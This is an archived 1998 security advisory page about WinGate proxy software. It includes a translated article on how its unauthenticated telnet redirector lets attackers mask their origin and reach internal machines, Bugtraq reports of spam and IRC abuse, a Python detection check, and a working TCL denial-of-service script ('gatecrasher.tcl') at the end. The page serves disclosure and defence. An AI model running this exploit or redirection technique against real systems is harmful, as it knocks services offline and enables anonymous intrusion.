Wingate telnet redirection

Summary
Description: A somewhat common technique for attackers is to install "telnet redirectors" on a system they have compromised. This allows them to telnet to the redirector and then telnet out from there anonymously, masking their true point of origin. These attackers no longer need to bother with penetrating systems, as WinGate includes anonymous telnet redirection as a feature enabled by default! Just telnet to port 1080 or 23 and then telnet right back out to wreak havoc on the Internet. And don't worry, it doesn't (by default) log anything! <sigh>
Author: Alans other account <alanb@MANAWATU.GEN.NZ>
Compromise: Intruders can mask their true point of origin by going through WinGate
Vulnerable Systems: Windows boxes running WinGate
Date: 11 February 1998
Notes: Many thanks to Dairo Bel <dairo@akrata.org> for translating his Spanish article on WinGate and sending it in! Also note that you can use nmap, a network port scanner I wrote, to locate hosts on your network that are running WinGate.
Details



Date: Wed, 06 May 1998 22:37:04 +0300
From: Dairo Bel 
To: fyodor@nmap.org
Subject: WinGate> Use and Abuse

Hi fyodor:

[cut]

-----------------------------cut here--------------------------------
Well, here I'm going to explain to all of you the amazing use that one WinGate could have.
But... let's start at the beginning.

1.- Overview:

Imagine that we have 3 computers in our home, but only one modem. Of course, we would like to be
able to access the Internet with all 3 computers, but there is an obvious problem: although these
computers are connected in a net, only the one which has the modem can access the Internet. The
way to be able to access it with all of them is proxy software. A proxy (if somebody doesn't know
it) is something like a footbridge, in the sense that you can jump to another place; in this case,
the Internet.
What it does is negotiate the different outgoing requests which we make in our 3-computer net.
Although only the first computer is connected to the Internet, the second and third can be
connected through it.


2.- Software:

WinGate is Windows 95 or Windows NT software which negotiates the requests of our little net. The
way to implement it is (like everything in Windows) very simple; it even has options set by
default. The other computers have internal IPs, and when a request goes out of the little net,
the WinGate replaces those IPs with its own IP, so it seems that all the requests have been made
by the same computer, when in fact that isn't true. The port opened by default is 1080.


3.- Description:

The footbridge which is used by our 3 computers should be closed to everybody who doesn't belong
to our little net. That's why anyone could connect to our WinGate and leave with our IP address.

The main bug is that the WinGate doesn't try to authenticate the user who is connecting to it.

The way this can occur is simply by making a telnet connection to the WinGate IP, and this will
appear to us:
WinGate>

Then we can use it like a footbridge, because it thinks that the attacker is one of the internal
net computers. It is enough to put in the IP to which I want to connect, and from there it leaves
for the Internet with the WinGate IP. For example, if our net is im.agoodboy.com, an attacker,
for example im.abadguy.com, could do this:

im.abadguy.com$ telnet im.agoodboy.com
trying.. im.agoodboy.com
connected
WinGate>193.158.24.5
trying... 193.158.24.5
connected
System RH 4.2
login:

Etc. Well, what the attacker has done is connect from im.abadguy.com to the WinGate (our net),
and through it to the 193.158.24.5 IP. The IP that 193.158.24.5 will receive will be the WinGate
IP (our IP!), not the attacker's IP.

That isn't the only thing that he could do. If he wants, he could do this through any other
port, like ftp, mail, etc. From here, we can deduce that we would be able to send *totally*
anonymous mail, as if it were a remailer, or one of those old sendmails.

Another weakness in the WinGates is that if we know the IPs in the internal net, we can have
total access without any problem. If the computers in the internal net are running under Windows,
and I have installed Samba (to have access to the WinGate), we can connect directly to them. If
the internal computers are running under some UNIX, we can do a telnet to them. Please think
what could occur if the internal computers have a ++ in their .rhosts file to have simple
access between them. The owner of the little net was thinking that he is safe from external
attacks, because he is protected by a proxy... when that certainly isn't the case.

If we put a WinGate as the server in our IRC client, we can send commands to another IRC
server by virtue of /quote or /raw (depending on the client). It's possible to jump to another
site in that manner too.

Another possible attack may occur if our little net has shared resources. In that case, the
attacker could configure the WinGate as his default gateway. After that, he would be able to
"see" all the computers in our network, because the WinGate thinks that he is one of them. In
this manner, the WinGate turns into something like a router for the attacker. If he wanted, for
example, he could put a sniffer on his own machine. All the information which leaves our
network would pass first through the WinGate, and through the attacker after that...

One more possibility is to connect to a WinGate on port 808. If it's badly configured, two
things may happen. The machine could crash, or we could enter directly into their internal net.
This vulnerability doesn't always work, but sometimes it does. I can't determine why.

Finally, I'll only say that the WinGate doesn't keep *any* type of logs. If you connect to a
WinGate, nobody will be able to know which IP connected to it. In WinGate versions 1.3 and 1.3*,
the WinGate software DOESN'T keep logs, and no option exists to keep them. It's 100%
anonymous. In version 2.0 there is an option, and if you activate it, the logs are kept. By
default, that option isn't activated. About 80% of the companies which use WinGate have the 1.3
version of this software, so if anyone uses it in a malicious mode, you will be anonymous.


4.- Conclusions

If we don't take care to remove all of the gateways which give access from the network, and keep
only the proxy, the WinGate software lets an attacker connect through it and camouflage himself
in a perfectly anonymous mode.

In the same way, under certain conditions, it is possible to have access to the computers in the
internal network.
This bug exists up to version 2.0 at least.

5.- Greetings:

To my beloved girlfriend M.A., and to the man who gave me the idea to use a WinGate as a
gateway.

dairo@akrata.org

If you want, you can use this PGP key to mail me:


-----------------------------cut here--------------------------------

Best Regards,
   Dairo Bel
                                 oOo !Hispahack Research Team oOo
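
The unauthenticated "WinGate>" greeting described above is also what an administrator can look for when auditing their own network for open redirectors (the summary note suggests nmap to locate WinGate hosts). The following Python check is an added example, not code from the article or from WinGate: it connects to a host, reads whatever banner the service volunteers, and flags the host when that banner is the redirector prompt. The fake service and all helper names are constructed for this example so it runs offline.

```python
import socket
import threading

# Prompt an unauthenticated WinGate telnet redirector shows on connect.
WINGATE_PROMPT = b"WinGate>"

def read_banner(host, port, timeout=3.0, max_bytes=256):
    """Connect, send nothing, and return whatever the service volunteers."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        data = b""
        while len(data) < max_bytes and WINGATE_PROMPT not in data:
            try:
                chunk = s.recv(64)
            except socket.timeout:
                break  # quiet service: nothing more is coming
            if not chunk:
                break  # peer closed the connection
            data += chunk
        return data

def is_open_wingate_redirector(host, port=23):
    """True when the host greets an unauthenticated client with 'WinGate>'.
    Connection failures count as "not open" rather than raising, so the
    check can sweep a whole subnet without stopping on dead hosts."""
    try:
        return WINGATE_PROMPT in read_banner(host, port)
    except OSError:
        return False

def start_fake_service(greeting):
    """Constructed stand-in for a 1.3-era WinGate (or any other telnet
    service) so the check can be exercised offline. Returns the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(greeting)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

if __name__ == "__main__":
    port = start_fake_service(WINGATE_PROMPT)
    print("127.0.0.1:%d open redirector: %s"
          % (port, is_open_wingate_redirector("127.0.0.1", port)))
```

Run against a real host list, only the host/port arguments of is_open_wingate_redirector change; a hit means the redirector is reachable without any authentication, exactly as described in the article.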

Date: Wed, 11 Feb 1998 15:14:02 +1300
From: Alans other account <alanb@MANAWATU.GEN.NZ>
To: BUGTRAQ@NETSPACE.ORG
Subject: WIngate: the sequel

I've had a fair amount of mail following my posting about this to
the list. What follows is a very brief summary.

1: Confirmation that a large number of sites have already
experienced spammers smtp relaying via insecure wingates. Numbers
relayed have ranged from "a couple of thousand" to "over 20,000"
messages.

2: Ditto on nntp. This seems to be a favourite method for porn
spammers in particular.

3: Ditto on IRC. I have a mirc IRC abuse script on hand which quite
happily searches for wingates and attaches one floodbot per
gateway. Tests have shown that upwards of 100 wingates can quite
easily be used by a single attacker.

4: Open wingates are also wide open for any savvy attacker to
attach to machines behind the wingate "firewall".

5: Although the primary attack method is to use socks port 1080,
the same techniques are easily used on port 23, so firewalling
socks is a temporary solution at best.


All of these are worrying, given the number of people who attack
sites perceived as participating in spam.

There's a fairly good set of web pages on securing wingate at
http://www.deerfield.com/wingate/secure-wingate.htm - this appears
to be the Wingate home site.


The Undernet IRC network has had to temporarily lock out users from
2 large cable networks in Canada and the USA due to attacks against
network admins. Those attacks were at one point coming from upwards
of 200 different IPs and seemed to be driven by one individual.

Given Wingate's lack of logging facilities, there is almost no hope
of tracing attackers who initiate denial of service actions like
this, so ISPs may well face having this kind of action taken
against them by IRC (or other) networks in order to maintain
usability of their systems. The end result is chaos on helpdesks.

Wingate's authors apparently are continuing to ignore the abuse
issues associated with default settings.
How long before they get the message?

AB

From carother@OU.EDU Wed May 13 00:48:32 1998
Date: Sat, 21 Feb 1998 04:38:56 -0600
From: Matt Carothers <carother@OU.EDU>
To: BUGTRAQ@NETSPACE.ORG
Subject: WinGate DoS

After a WinGate attack on our IRC channel, a friend of mine was toying around and discovered a fun bug:

$ telnet unsecured.wingate.com
Trying XXX.XX.XX.XXX...
Connected to XXX.XX.XX.XXX.
Escape character is '^]'.

WinGate>localhost
Connecting to host localhost...Connected

As you can see, the WinGate happily connects to itself. Do this enough times, and ...

WinGate>localhost
Connecting to host localhost...Out of buffers

At this point, the WinGate stops forwarding connections. Clients can still connect but cannot make use of it.

Below is a simple TCL exploit to demonstrate the idea.

#!/usr/local/bin/tclsh

# gatecrasher.tcl
#
# This opens a WinGate and connects it to itself repeatedly until the
# target machine runs out of buffers and stops forwarding connections.
# The WinGate will not function as long as the script is running.
#
# Credit goes to Chris Snell <texan@hooked.net> for finding the bug.
#
# I apologize in advance for not being cool enough to script this in perl.
#
# - Matt Carothers <carother@ou.edu>

set host [lindex $argv 0];
set port [lindex $argv 1];

if {![string compare $host ""]} {
    set command [string range $argv0 [expr [string last / $argv0] + 1] end];
    puts stdout "Usage: $command <host> \[port\]";
    exit 1;
}

if {![string compare $port ""]} {
    set port 23;
}

if {[catch {set sock [socket $host $port]} stuff]} {
    # Could not connect for some reason. Output an error message and exit.
    puts stdout "$host:$port : $stuff";
    exit 1;
}

puts stdout "Connected to $host:$port. Launching WinGate kill ...";

set flag 0;

puts $sock "localhost";
flush $sock;

while {[gets $sock line] >= 0} {
    if {[string match "*Connected*" $line]} {
        # We've successfully connected the WinGate to itself.
        # Whee, let's do it again.

        puts $sock "localhost";
        flush $sock;

        puts -nonewline stdout ".";
        flush stdout;

        set flag 0;
    } elseif {[string match "*Out of buffers*" $line]} {
        # The WinGate is now out of buffers.
        # We'll output a message to that effect and keep trying.  This
        # serves as a keep-alive and lets us jump in and fill any buffers
        # freed by clients which disconnect after the attack succeeds.

        if {!$flag} {
            puts stdout "\n*plink*";
            set flag 1;
        }

        puts $sock "localhost";
        flush $sock;
    }
}

puts stdout "\nConnection lost.";


This page is part of Fyodor's exploit world.